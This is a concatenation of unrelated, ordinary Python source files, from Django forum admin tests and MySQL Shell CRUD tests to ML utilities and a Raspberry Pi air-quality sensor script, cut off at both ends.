test_category = Category.objects.get(slug="test-category")
with assert_invalidates_cache(ACL_CACHE):
self.client.post(
reverse(
"misago:admin:categories:edit", kwargs={"pk": test_category.pk}
),
data={
"name": "Test Category Edited",
"new_parent": root.pk,
"role": "category",
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
def test_move_views(self):
"""move up/down views have no showstoppers"""
root = Category.objects.root_category()
first_category = Category.objects.get(slug="first-category")
self.client.post(
reverse("misago:admin:categories:new"),
data={
"name": "Category A",
"new_parent": root.pk,
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
category_a = Category.objects.get(slug="category-a")
self.client.post(
reverse("misago:admin:categories:new"),
data={
"name": "Category B",
"new_parent": root.pk,
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
category_b = Category.objects.get(slug="category-b")
response = self.client.post(
reverse("misago:admin:categories:up", kwargs={"pk": category_b.pk})
)
self.assertEqual(response.status_code, 302)
self.assertValidTree(
[
(root, 0, 1, 8),
(first_category, 1, 2, 3),
(category_b, 1, 4, 5),
(category_a, 1, 6, 7),
]
)
response = self.client.post(
reverse("misago:admin:categories:up", kwargs={"pk": category_b.pk})
)
self.assertEqual(response.status_code, 302)
self.assertValidTree(
[
(root, 0, 1, 8),
(category_b, 1, 2, 3),
(first_category, 1, 4, 5),
(category_a, 1, 6, 7),
]
)
response = self.client.post(
reverse("misago:admin:categories:down", kwargs={"pk": category_b.pk})
)
self.assertEqual(response.status_code, 302)
self.assertValidTree(
[
(root, 0, 1, 8),
(first_category, 1, 2, 3),
(category_b, 1, 4, 5),
(category_a, 1, 6, 7),
]
)
response = self.client.post(
reverse("misago:admin:categories:down", kwargs={"pk": category_b.pk})
)
self.assertEqual(response.status_code, 302)
self.assertValidTree(
[
(root, 0, 1, 8),
(first_category, 1, 2, 3),
(category_a, 1, 4, 5),
(category_b, 1, 6, 7),
]
)
response = self.client.post(
reverse("misago:admin:categories:down", kwargs={"pk": category_b.pk})
)
self.assertEqual(response.status_code, 302)
self.assertValidTree(
[
(root, 0, 1, 8),
(first_category, 1, 2, 3),
(category_a, 1, 4, 5),
(category_b, 1, 6, 7),
]
)
class CategoryAdminDeleteViewTests(CategoryAdminTestCase):
def setUp(self):
"""
Create categories tree for test cases:
First category (created by migration)
Category A
+ Category B
+ Subcategory C
+ Subcategory D
Category E
+ Category F
"""
super().setUp()
self.root = Category.objects.root_category()
self.first_category = Category.objects.get(slug="first-category")
self.client.post(
reverse("misago:admin:categories:new"),
data={
"name": "Category A",
"new_parent": self.root.pk,
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
self.client.post(
reverse("misago:admin:categories:new"),
data={
"name": "Category E",
"new_parent": self.root.pk,
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
self.category_a = Category.objects.get(slug="category-a")
self.category_e = Category.objects.get(slug="category-e")
self.client.post(
reverse("misago:admin:categories:new"),
data={
"name": "Category B",
"new_parent": self.category_a.pk,
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
self.category_b = Category.objects.get(slug="category-b")
self.client.post(
reverse("misago:admin:categories:new"),
data={
"name": "Subcategory C",
"new_parent": self.category_b.pk,
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
self.category_c = Category.objects.get(slug="subcategory-c")
self.client.post(
reverse("misago:admin:categories:new"),
data={
"name": "Subcategory D",
"new_parent": self.category_b.pk,
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
self.category_d = Category.objects.get(slug="subcategory-d")
self.client.post(
reverse("misago:admin:categories:new"),
data={
"name": "Category F",
"new_parent": self.category_e.pk,
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
self.category_f = Category.objects.get(slug="category-f")
def test_delete_category_move_contents(self):
"""category was deleted and its contents were moved"""
for _ in range(10):
test.post_thread(self.category_b)
self.assertEqual(Thread.objects.count(), 10)
response = self.client.get(
reverse("misago:admin:categories:delete", kwargs={"pk": self.category_b.pk})
)
self.assertEqual(response.status_code, 200)
response = self.client.post(
reverse(
"misago:admin:categories:delete", kwargs={"pk": self.category_b.pk}
),
data={
"move_children_to": self.category_e.pk,
"move_threads_to": self.category_d.pk,
},
)
self.assertEqual(response.status_code, 302)
self.assertEqual(Category.objects.all_categories().count(), 6)
self.assertEqual(Thread.objects.count(), 10)
for thread in Thread.objects.all():
self.assertEqual(thread.category_id, self.category_d.pk)
self.assertValidTree(
[
(self.root, 0, 1, 14),
(self.first_category, 1, 2, 3),
(self.category_a, 1, 4, 5),
(self.category_e, 1, 6, 13),
(self.category_f, 2, 7, 8),
(self.category_c, 2, 9, 10),
(self.category_d, 2, 11, 12),
]
)
def test_delete_category_and_contents(self):
"""category and its contents were deleted"""
for _ in range(10):
test.post_thread(self.category_b)
response = self.client.get(
reverse("misago:admin:categories:delete", kwargs={"pk": self.category_b.pk})
)
self.assertEqual(response.status_code, 200)
response = self.client.post(
reverse(
"misago:admin:categories:delete", kwargs={"pk": self.category_b.pk}
),
data={"move_children_to": "", "move_threads_to": ""},
)
self.assertEqual(response.status_code, 302)
self.assertEqual(Category.objects.all_categories().count(), 4)
self.assertEqual(Thread.objects.count(), 0)
self.assertValidTree(
[
(self.root, 0, 1, 10),
(self.first_category, 1, 2, 3),
(self.category_a, 1, 4, 5),
(self.category_e, 1, 6, 9),
(self.category_f, 2, 7, 8),
]
)
def test_delete_leaf_category_and_contents(self):
"""leaf category was deleted with contents"""
for _ in range(10):
test.post_thread(self.category_d)
self.assertEqual(Thread.objects.count(), 10)
response = self.client.get(
reverse("misago:admin:categories:delete", kwargs={"pk": self.category_d.pk})
)
self.assertEqual(response.status_code, 200)
response = self.client.post(
reverse(
"misago:admin:categories:delete", kwargs={"pk": self.category_d.pk}
),
data={"move_children_to": "", "move_threads_to": ""},
)
self.assertEqual(response.status_code, 302)
self.assertEqual(Category.objects.all_categories().count(), 6)
self.assertEqual(Thread.objects.count(), 0)
self.assertValidTree(
[
(self.root, 0, 1, 14),
(self.first_category, 1, 2, 3),
(self.category_a, 1, 4, 9),
(self.category_b, 2, 5, 8),
(self.category_c, 3, 6, 7),
(self.category_e, 1, 10, 13),
(self.category_f, 2, 11, 12),
]
)
def test_deleting_category_invalidates_acl_cache(self):
with assert_invalidates_cache(ACL_CACHE):
self.client.post(
reverse(
"misago:admin:categories:delete", kwargs={"pk": self.category_d.pk}
),
data={"move_children_to": "", "move_threads_to": ""},
)
|
import pandas as pd
import numpy as np
from glob import glob
import argparse
import os
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--sub-dir', type=str, default='./subs')
args, _ = parser.parse_known_args()
return args
if __name__ == '__main__':
args = parse_args()
subs = [pd.read_csv(csv) for csv in sorted(glob(os.path.join(args.sub_dir, '*csv')))]
sub_probs = [sub.target.rank(pct=True).values for sub in subs]
wts = [1/18]*18
assert len(wts)==len(sub_probs)
sub_ens = np.sum([wts[i]*sub_probs[i] for i in range(len(wts))],axis=0)
df_sub = subs[0]
df_sub['target'] = sub_ens
df_sub.to_csv(f"final_sub1.csv",index=False)
|
# Generated by Django 4.0.1 on 2022-02-04 13:28
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('Clients', '0001_initial'),
('Organizations', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='clientcard',
name='organization',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='organization_client_card', to='Organizations.organization', verbose_name='Organization'),
),
migrations.AddField(
model_name='client',
name='organization',
field=models.ManyToManyField(related_name='organization_clients', to='Organizations.Organization', verbose_name='Organization'),
),
migrations.AlterUniqueTogether(
name='clientcard',
unique_together={('organization', 'phone')},
),
]
|
import os
import logging
from pathlib import Path
from typing import List, Optional
from redis import Redis
from photon.common.redis_semaphore import ParamsNT, Semaphore
from photon.common.config_context_common import ConfigContextCommon
class RedisCommon(object):
"""
Wrapper class for accessing Redis.
"""
def __init__(self, config: ConfigContextCommon) -> None:
"""
Args:
config: A config object.
"""
logname = Path(__file__).stem
self._logger = logging.getLogger(f"{config.PACKAGE_NAME}.{logname}")
redis_host = os.environ.get("REDISHOST", "localhost")
redis_port = int(os.environ.get("REDISPORT", 6379))
self._redis = Redis(host=redis_host, port=redis_port)
self._app_key = f"app:{config.PACKAGE_NICKNAME}"
self._semaphores: List[Semaphore] = []
def get_semaphore(self, name: str = "default") -> Semaphore:
"""
Initialize a redis-based distributed multi-process/multi-thread
Semaphore object for the calling thread.
Args:
name: The shared name of the semaphore.
Returns:
A Semaphore object for acquire() & release() or use as a context mgr (with).
"""
app_sem_key = f"{self._app_key}.semaphore:{name}"
semaphore = Semaphore(self._redis, name=app_sem_key)
self._semaphores.append(semaphore)
return semaphore
def get_semaphore_params(self, name: str = "default") -> Optional[ParamsNT]:
"""
Proxy to Semaphore get_params() static method
"""
return Semaphore.get_params(self._redis, name=name)
def set_semaphore_params(
self,
name: str = "default",
capacity: int = 100,
timeoutms: int = 10 * 60 * 1000,
decay: float = 0.95,
sleepms: int = 100,
) -> None:
"""
Proxy to Semaphore set_params() static method
"""
Semaphore.set_params(
self._redis,
name=name,
capacity=capacity,
timeoutms=timeoutms,
sleepms=sleepms,
decay=decay,
)
def failfast(self) -> None:
"""
Upon a failfast event, an app should call this method, e.g. in its failfast.py,
to explicitly delete any traces of its semaphores in redis.
"""
for semaphore in self._semaphores:
try:
semaphore.failfast()
except Exception:
pass
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import argparse
from itertools import zip_longest
def replace_oovs(source_in, target_in, vocabulary, source_out, target_out):
"""Replaces out-of-vocabulary words in source and target text with <unk-N>,
where N in is the position of the word in the source sequence.
"""
def format_unk(pos):
return "<unk-{}>".format(pos)
if target_in is None:
target_in = []
for seq_num, (source_seq, target_seq) in enumerate(
zip_longest(source_in, target_in)
):
source_seq_out = []
target_seq_out = []
word_to_pos = dict()
for position, token in enumerate(source_seq.strip().split()):
if token in vocabulary:
token_out = token
else:
if token in word_to_pos:
oov_pos = word_to_pos[token]
else:
word_to_pos[token] = position
oov_pos = position
token_out = format_unk(oov_pos)
source_seq_out.append(token_out)
source_out.write(" ".join(source_seq_out) + "\n")
if target_seq is not None:
for token in target_seq.strip().split():
if token in word_to_pos:
token_out = format_unk(word_to_pos[token])
else:
token_out = token
target_seq_out.append(token_out)
if target_out is not None:
target_out.write(" ".join(target_seq_out) + "\n")
def main():
parser = argparse.ArgumentParser(
description="Replaces out-of-vocabulary words in both source and target "
"sequences with tokens that indicate the position of the word "
"in the source sequence."
)
parser.add_argument(
"--source", type=str, help="text file with source sequences", required=True
)
parser.add_argument(
"--target", type=str, help="text file with target sequences", default=None
)
parser.add_argument("--vocab", type=str, help="vocabulary file", required=True)
parser.add_argument(
"--source-out",
type=str,
help="where to write source sequences with <unk-N> entries",
required=True,
)
parser.add_argument(
"--target-out",
type=str,
help="where to write target sequences with <unk-N> entries",
default=None,
)
args = parser.parse_args()
with open(args.vocab, encoding="utf-8") as vocab:
vocabulary = vocab.read().splitlines()
target_in = (
open(args.target, "r", encoding="utf-8") if args.target is not None else None
)
target_out = (
open(args.target_out, "w", encoding="utf-8")
if args.target_out is not None
else None
)
with open(args.source, "r", encoding="utf-8") as source_in, open(
args.source_out, "w", encoding="utf-8"
) as source_out:
replace_oovs(source_in, target_in, vocabulary, source_out, target_out)
if target_in is not None:
target_in.close()
if target_out is not None:
target_out.close()
if __name__ == "__main__":
main()
|
s = "7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450"
nums = [int(c) for c in s]
start = 0
end = 12
max_prod = 0
prod = 1
while end < len(nums):
prod = 1
for i in range(start, end + 1):
prod *= nums[i]
if prod > max_prod:
max_prod = prod
start += 1
end += 1
print(max_prod)
|
# _base_ = './faster_rcnn_r50_fpn_1x_coco.py'
_base_ = [
'../_base_/models/faster_rcnn_r50_fpn.py',
'../_base_/datasets/coco_detection.py',
'../_base_/schedules/schedule_1x.py', '../_base_/default_runtime.py'
]
# fp16 settings
fp16 = dict(loss_scale=512.)
|
#!/usr/bin/env python
# encoding: utf-8
import gym
import gym_trivial
N_ITER = 10
if __name__ == "__main__":
env = gym.make("trivial-v0")
for i in range(N_ITER):
x = env.step(env.action_space.sample())
print(x)
|
from django.urls import path
from web.endpoint import views
urlpatterns = [
path('', views.HomeView.as_view(), name='home'),
path(r'upload/', views.UploadView.as_view(), name='upload'),
path(r'star/', views.StarView.as_view(), name='star'),
]
|
from .inventory_service import InventoryService, ReservationState, ReservationException
|
# Assumptions: validate_crud_functions available
# Assumes __uripwd is defined as <user>:<pwd>@<host>:<plugin_port>
from __future__ import print_function
from mysqlsh import mysqlx
mySession = mysqlx.get_session(__uripwd)
mySession.drop_schema('js_shell_test')
schema = mySession.create_schema('js_shell_test')
# Creates a test collection and inserts data into it
collection = schema.create_collection('collection1')
# ---------------------------------------------
# Collection.add Unit Testing: Dynamic Behavior
# ---------------------------------------------
#@ CollectionAdd: valid operations after add with no documents
crud = collection.add([])
validate_crud_functions(crud, ['add', 'execute'])
#@ CollectionAdd: valid operations after add
crud = collection.add({"_id":"sample", "name":"john", "age":17, "account": None})
validate_crud_functions(crud, ['add', 'execute'])
#@ CollectionAdd: valid operations after execute
result = crud.execute()
validate_crud_functions(crud, ['add', 'execute'])
# ---------------------------------------------
# Collection.add Unit Testing: Error Conditions
# ---------------------------------------------
#@# CollectionAdd: Error conditions on add
crud = collection.add()
crud = collection.add(45)
crud = collection.add(['invalid data'])
crud = collection.add(mysqlx.expr('5+1'))
crud = collection.add([{'name': 'sample'}, 'error']);
crud = collection.add({'name': 'sample'}, 'error');
# ---------------------------------------
# Collection.Add Unit Testing: Execution
# ---------------------------------------
#@<> Collection.add execution {VER(>=8.0.11)}
result = collection.add({ "name": 'document01', "Passed": 'document', "count": 1 }).execute()
EXPECT_EQ(1, result.affected_item_count)
EXPECT_EQ(1, result.affected_items_count)
EXPECT_EQ(1, len(result.generated_ids))
EXPECT_EQ(1, len(result.get_generated_ids()))
# WL11435_FR3_1
EXPECT_EQ(result.generated_ids[0], collection.find('name = "document01"').execute().fetch_one()._id);
id_prefix = result.generated_ids[0][:8]
#@<> WL11435_FR3_2 Collection.add execution, Single Known ID
result = collection.add({ "_id": "sample_document", "name": 'document02', "passed": 'document', "count": 1 }).execute()
EXPECT_EQ(1, result.affected_item_count)
EXPECT_EQ(1, result.affected_items_count)
EXPECT_EQ(0, len(result.generated_ids))
EXPECT_EQ(0, len(result.get_generated_ids()))
EXPECT_EQ('sample_document', collection.find('name = "document02"').execute().fetch_one()._id);
#@ WL11435_ET1_1 Collection.add error no id {VER(<8.0.11)}
result = collection.add({'name': 'document03', 'Passed': 'document', 'count': 1 }).execute();
#@<> Collection.add execution, Multiple {VER(>=8.0.11)}
result = collection.add([{ "name": 'document03', "passed": 'again', "count": 2 }, { "name": 'document04', "passed": 'once again', "count": 3 }]).execute()
EXPECT_EQ(2, result.affected_item_count)
EXPECT_EQ(2, result.affected_items_count)
# WL11435_ET2_6
EXPECT_EQ(2, len(result.generated_ids))
EXPECT_EQ(2, len(result.get_generated_ids()))
# Verifies IDs have the same prefix
EXPECT_EQ(id_prefix, result.generated_ids[0][:8]);
EXPECT_EQ(id_prefix, result.generated_ids[1][:8]);
# WL11435_FR3_1 Verifies IDs are assigned in the expected order
EXPECT_EQ(result.generated_ids[0], collection.find('name = "document03"').execute().fetch_one()._id);
EXPECT_EQ(result.generated_ids[1], collection.find('name = "document04"').execute().fetch_one()._id);
# WL11435_ET2_2 Verifies IDs are sequential
EXPECT_TRUE(result.generated_ids[0] < result.generated_ids[1]);
#@<> WL11435_ET2_3 Collection.add execution, Multiple Known IDs
result = collection.add([{ "_id": "known_00", "name": 'document05', "passed": 'again', "count": 2 }, { "_id": "known_01", "name": 'document06', "passed": 'once again', "count": 3 }]).execute()
EXPECT_EQ(2, result.affected_item_count)
EXPECT_EQ(2, result.affected_items_count)
# WL11435_ET2_5
EXPECT_EQ(0, len(result.generated_ids))
EXPECT_EQ(0, len(result.get_generated_ids()))
EXPECT_EQ('known_00', collection.find('name = "document05"').execute().fetch_one()._id);
EXPECT_EQ('known_01', collection.find('name = "document06"').execute().fetch_one()._id);
result = collection.add([]).execute()
EXPECT_EQ(-1, result.affected_item_count)
EXPECT_EQ(-1, result.affected_items_count)
EXPECT_EQ(0, len(result.generated_ids))
EXPECT_EQ(0, len(result.get_generated_ids()))
#@ Collection.add execution, Variations >=8.0.11 {VER(>=8.0.11)}
//! [CollectionAdd: Chained Calls]
result = collection.add({ "name": 'my fourth', "passed": 'again', "count": 4 }).add({ "name": 'my fifth', "passed": 'once again', "count": 5 }).execute()
print("Affected Rows Chained:", result.affected_items_count, "\n")
//! [CollectionAdd: Chained Calls]
//! [CollectionAdd: Using an Expression]
result = collection.add(mysqlx.expr('{"name": "my fifth", "passed": "document", "count": 1}')).execute()
print("Affected Rows Single Expression:", result.affected_items_count, "\n")
//! [CollectionAdd: Using an Expression]
//! [CollectionAdd: Document List]
result = collection.add([{ "name": 'my sexth', "passed": 'again', "count": 5 }, mysqlx.expr('{"name": "my senevth", "passed": "yep again", "count": 5}')]).execute()
print("Affected Rows Mixed List:", result.affected_items_count, "\n")
//! [CollectionAdd: Document List]
//! [CollectionAdd: Multiple Parameters]
result = collection.add({ "name": 'my eigth', "passed": 'yep', "count": 6 }, mysqlx.expr('{"name": "my nineth", "passed": "yep again", "count": 6}')).execute()
print("Affected Rows Multiple Params:", result.affected_items_count, "\n")
//! [CollectionAdd: Multiple Parameters]
#@<> Collection.add execution, Variations <8.0.11 {VER(<8.0.11)}
result = collection.add({'_id': '1E9C92FDA74ED311944E00059A3C7A44', "name": 'my fourth', "passed": 'again', "count": 4 }).add({'_id': '1E9C92FDA74ED311944E00059A3C7A45', "name": 'my fifth', "passed": 'once again', "count": 5 }).execute()
EXPECT_EQ(2, result.affected_item_count)
EXPECT_EQ(2, result.affected_items_count)
result = collection.add(mysqlx.expr('{"_id": "1E9C92FDA74ED311944E00059A3C7A46", "name": "my fifth", "passed": "document", "count": 1}')).execute()
EXPECT_EQ(1, result.affected_item_count)
EXPECT_EQ(1, result.affected_items_count)
result = collection.add([{'_id': '1E9C92FDA74ED311944E00059A3C7A47', "name": 'my sexth', "passed": 'again', "count": 5 }, mysqlx.expr('{"_id": "1E9C92FDA74ED311944E00059A3C7A48", "name": "my senevth", "passed": "yep again", "count": 5}')]).execute()
EXPECT_EQ(2, result.affected_item_count)
EXPECT_EQ(2, result.affected_items_count)
result = collection.add({'_id': '1E9C92FDA74ED311944E00059A3C7A49', "name": 'my eigth', "passed": 'yep', "count": 6 }, mysqlx.expr('{"_id": "1E9C92FDA74ED311944E00059A3C7A4A", "name": "my nineth", "passed": "yep again", "count": 6}')).execute()
EXPECT_EQ(2, result.affected_item_count)
EXPECT_EQ(2, result.affected_items_count)
# Cleanup
mySession.drop_schema('js_shell_test')
mySession.close()
|
#defines an effect
class Effects():
def __init__(self):
self.goalPatternList = []
self.effectPatternList = []
self.probList = []
self.valueList = []
def printInfo (self):
print("values:", self.valueList)
print("probs:", self.probList)
print("effectList:", self.effectPatternList)
print("goalPatternList:", self.goalPatternList)
|
import mock
from rest_framework import status
from rest_framework.test import APITestCase
try:
from django.urls import reverse
except ImportError:
from django.core.urlresolvers import reverse
DEFAULT_ACCEPT = (
'text/html,application/xhtml+xml,application/xml;q=0.9,'
'image/webp,image/apng,*/*;q=0.8'
)
class SearchRendererTests(APITestCase):
@mock.patch('complaint_search.es_interface.search')
def test_search_no_format_chrome_request(self, mock_essearch):
expected = {'foo': 'bar'}
mock_essearch.return_value = expected
url = reverse('complaint_search:search')
response = self.client.get(url, HTTP_ACCEPT=DEFAULT_ACCEPT)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(expected, response.data)
self.assertEqual(response['Content-Type'], 'application/json')
@mock.patch('complaint_search.es_interface.search')
def test_search_accept_html_only(self, mock_essearch):
expected = {'foo': 'bar'}
mock_essearch.return_value = expected
accept = 'text/html'
url = reverse('complaint_search:search')
response = self.client.get(url, HTTP_ACCEPT=accept)
self.assertEqual(response.status_code, 406)
self.assertEqual(response['Content-Type'], 'application/json')
|
import redis
def sigmaActions(occur):
'''
Every small step counts.
'''
cpool = redis.ConnectionPool(host='localhost',
port=6379,
decode_responses=True,
db=0,)
r = redis.Redis(connection_pool=cpool)
r.lpush('actions', occur)
# record last 9999 actions timenode
if r.llen('actions') > 9999:
r.ltrim('actions', 0, 9999)
|
# Copyright (2013) Sandia Corporation. Under the terms of Contract
# DE-AC04-94AL85000 with Sandia Corporation, the U.S. Government
# retains certain rights in this software.
#
# This software is released under the FreeBSD license as described
# in License.txt
import time
import random
import _gui
import json # Python 2.6 or later
def run():
uuid = ""
# skip 'E' because it causes issues by trying to interpret a string as a number
# 0123456789012345678901234
sLetters = "ABCDFGHIJKLMNOPQRSTUVWXYZ"
# get the number of milliseconds since Jan 1 1970 (epoch)
nTime = int(1000 * time.time())
sTime = str(nTime)
#convert each number into a letter (only A-K so far)
for i in range(0, len(sTime)):
n = int(sTime[i])
uuid = uuid + sLetters[n]
#
# add 16 random letters from the list of 25 above
sRandom = ""
for i in range(0, 16):
nRandom = int(25 * random.random())
sRandom += sLetters[nRandom]
#
uuid += sRandom
return uuid
def main():
_gui.setHost()
for req in _gui.getRequests():
sDb = _gui.getQuery(req, "db")
_gui.setDatabase(sDb)
sCount = _gui.getQuery(req, "count", "1")
nCount = int(sCount)
uuids = []
for iCount in range(0, nCount):
sUuid = run()
uuids.append(sUuid)
if nCount == 1:
_gui.respondJSON(json.dumps({"uuid": sUuid}))
else:
_gui.respondJSON(json.dumps({"uuids": uuids}))
if __name__ == "__main__":
main()
|
#!/usr/bin/env python3
'''
@attention:
sudo apt-get install python3-pip
sudo pip3 install --upgrade setuptools
sudo pip3 install smbus
sudo pip3 install smbus2
sudo pip3 install unicornhatmini
sudo pip3 install bme680
sudo pip3 install pimoroni-sgp30
sudo pip3 install rv3028
sudo python3 diyzeniaq.py
@bug: Beta!
@summary: DIYzenIAQ
@see: https://work.saraceni.org/airquality/
@author: Andrea Saraceni
@contact: https://twitter.com/saraceni_andrea/
@license: MIT
@date: 31.08.2021
@version: 0.9.1
'''
from subprocess import call
from threading import Thread
import math, os, sys, time
import rv3028
import bme680
from sgp30 import SGP30
from unicornhatmini import UnicornHATMini
from gpiozero import Button
class DIYzenIAQ:
def __init__(self):
try:
self.unicornhatmini = UnicornHATMini()
self.unicornhatmini.clear()
self.unicornhatmini.set_brightness(0.02)
self.unicornhatmini.set_rotation(0)
self.button_a = Button(5)
self.button_b = Button(6)
self.button_x = Button(16)
self.button_y = Button(24)
self.button_mode = 0
self.rtc = rv3028.RV3028()
self.rtc.set_battery_switchover("level_switching_mode")
self.rtc_now = None
self.bme680_data = bme680.BME680(0x77)
self.bme680_data.set_humidity_oversample(bme680.OS_2X) # bme680.OS_16X
self.bme680_data.set_temperature_oversample(bme680.OS_8X) # bme680.OS_16X
self.bme680_data.set_filter(bme680.FILTER_SIZE_3)
self.bme680_data.set_gas_status(bme680.ENABLE_GAS_MEAS)
self.bme680_data.set_gas_heater_temperature(320)
self.bme680_data.set_gas_heater_duration(150)
self.bme680_data.select_gas_heater_profile(0)
self.bme680_burn_in_time = 360 # 6 minutes = 360
self.bme680_humidity_baseline = 45.0 # optimal humidity value 40.0
self.bme680_humidity_weighting = 0.25 # humidity 25 : gas 75
self.bme680_gas_baseline = self.bme680_aqs = self.bme680_temperature = self.bme680_humidity = self.bme680_gas = 0
self.bme680_start_time = self.bme680_curr_time = time.time() # self.bme680_start_time = self.bme680_end_time = self.bme680_curr_time = time.time()
self.burn_in_mode = 0
self.sgp30 = SGP30()
self.data_sgp30_equivalent_co2 = self.data_sgp30_total_voc = 0
self.press_act = 1
self.led_act = 0
self.the_rgb = (0, 0, 0)
self.led_brightness_1 = (
(0, 0, 0, 0, 0), # (0.21, 0.21, 0.21, 0.21, 0.21),
(0, 0, 0, 0, 0), # (0.09, 0.21, 0.18, 0.12, 0.09),
(0, 0, 0, 0, 0), # (0.09, 0.21, 0.18, 0.12, 0.09),
(0.21, 0.18, 0.15, 0.12, 0.09),
(0.21, 0.18, 0.15, 0.12, 0.09),
(0.09, 0.12, 0.15, 0.18, 0.21))
self.led_brightness_2 = 0
self.the_elements = ("time", "temperature", "humidity", "eCO2", "TVOC", "VOC IAQ")
self.the_elements_range = (
(600, 1200, 1800, 2400),
(10, 16, 28, 35),
(20, 40, 60, 90),
(500, 1000, 1600, 2000),
(120, 220, 660, 2200),
(20, 40, 60, 80))
self.the_elements_palette_1 = (
((232, 129, 127), (195, 114, 124), (141, 82, 115), (90, 51, 110), (49, 31, 98)),
(
((0, 0, 255), (0, 100, 255)),
((0, 200, 255), (0, 255, 255)),
((0, 255, 0), (100, 255, 0)),
((255, 255, 0), (255, 200, 0)),
((255, 100, 0), (255, 0, 0))
),
(
((255, 100, 0), (255, 0, 0)),
((255, 255, 0), (255, 200, 0)),
((0, 255, 0), (100, 255, 0)),
((0, 200, 255), (0, 255, 255)),
((0, 0, 255), (0, 100, 255))
),
((0, 255, 0), (128, 255, 0), (255, 255, 0), (255, 128, 0), (255, 0, 0)),
((0, 255, 0), (128, 255, 0), (255, 255, 0), (255, 128, 0), (255, 0, 0)),
((255, 0, 0), (255, 128, 0), (255, 255, 0), (128, 255, 0), (0, 255, 0)))
except (KeyboardInterrupt, SystemExit):
self.unicornhatmini.clear()
self.button_a.close()
self.button_b.close()
self.button_x.close()
self.button_y.close()
print("*** Button close ***")
except Exception as e:
print("*** ERROR init: {0} ***".format(str(e)))
raise
else: self.fn_thread_go()
def fn_rv3028(self):
while True:
self.rtc_now = self.rtc.get_time_and_date()
# print("*** TIME DATE *** {:02d}:{:02d}:{:02d} *** {:02d}/{:02d}/{:02d} ***".format(self.rtc_now.hour, self.rtc_now.minute, self.rtc_now.second, self.rtc_now.day, self.rtc_now.month, self.rtc_now.year))
time.sleep(1)
def fn_bme680(self):
def __bme680_comfort():
# BETA
temp = int(self.bme680_temperature)
hum = int(self.bme680_humidity)
if temp < 20 and hum < 30: print("__bme680_comfort 1 *** The air is dry, unhappy / L'aria è secca, infelice")
elif temp < 20 and 30 <= hum <= 60: print("__bme680_comfort 2 *** Slightly cool and moist, moderate comfort / Leggermente fresco e umido, comfort moderato")
elif temp < 20 and hum > 60: print("__bme680_comfort 3 *** Air-cooled, comfortable in general / Raffreddato ad aria, confortevole in generale")
elif 20 <= temp <= 24 and hum < 30: print("__bme680_comfort 4 *** The air is dry, unhappy / L'aria è secca, infelice")
elif 20 <= temp <= 24 and 30 <= hum <= 60: print("__bme680_comfort 5 *** Fresh and comfortable, feeling great / Fresco e confortevole, sentirsi benissimo")
elif 20 <= temp <= 24 and hum > 60: print("__bme680_comfort 6 *** Air-cooled, comfortable in general / Raffreddato ad aria, confortevole in generale")
elif temp > 24 and hum < 30: print("__bme680_comfort 7 *** Hot and dry, need more water / Caldo e asciutto, serve più acqua")
elif temp > 24 and 30 <= hum <= 60: print("__bme680_comfort 8 *** Hot and dry, need more water / Caldo e asciutto, serve più acqua")
elif temp > 24 and hum > 60: print("__bme680_comfort 9 *** Hot and humid, poor comfort / Caldo e umido, scarso comfort")
else: print("__bme680_comfort 10 *** NO DATA!")
def __bme680_iaq():
hum = self.bme680_humidity
gas_bme = self.bme680_gas
gas_offset = self.bme680_gas_baseline - gas_bme
hum_offset = hum - self.bme680_humidity_baseline
if hum_offset > 0:
hum_score = (100 - self.bme680_humidity_baseline - hum_offset)
hum_score /= (100 - self.bme680_humidity_baseline)
hum_score *= (self.bme680_humidity_weighting * 100)
else:
hum_score = (self.bme680_humidity_baseline + hum_offset)
hum_score /= self.bme680_humidity_baseline
hum_score *= (self.bme680_humidity_weighting * 100)
if gas_offset > 0:
gas_score = (gas_bme / self.bme680_gas_baseline)
gas_score *= (100 - (self.bme680_humidity_weighting * 100))
else:
gas_score = 100 - (self.bme680_humidity_weighting * 100)
self.bme680_aqs = hum_score + gas_score
print("*** BME680 *** temperature {0:.2f} C *** humidity {1:.2f} %RH *** gas {2:.2f} Ohms *** IAQ {3:.2f} ***".format(self.bme680_temperature, self.bme680_humidity, self.bme680_gas, self.bme680_aqs))
def __bme680_sense():
while True:
if self.bme680_data.get_sensor_data():
self.bme680_temperature = self.bme680_data.data.temperature
self.bme680_humidity = self.bme680_data.data.humidity
__bme680_comfort()
if self.bme680_data.data.heat_stable:
self.bme680_gas = self.bme680_data.data.gas_resistance
__bme680_iaq()
else: print("*** BME680 partial values ...")
else: print("*** BME680 not ready ...")
time.sleep(1)
def __bme680_burn_in():
print("*** BME680 burn-in ...")
gas_burn = ""
bme680_burn_data = []
self.bme680_start_time = time.time()
# self.bme680_end_time = self.bme680_start_time + self.bme680_burn_in_time
while self.bme680_curr_time - self.bme680_start_time < self.bme680_burn_in_time:
self.bme680_curr_time = time.time()
if self.bme680_data.get_sensor_data() and self.bme680_data.data.heat_stable:
self.burn_in_mode = 1
gas_burn = self.bme680_data.data.gas_resistance
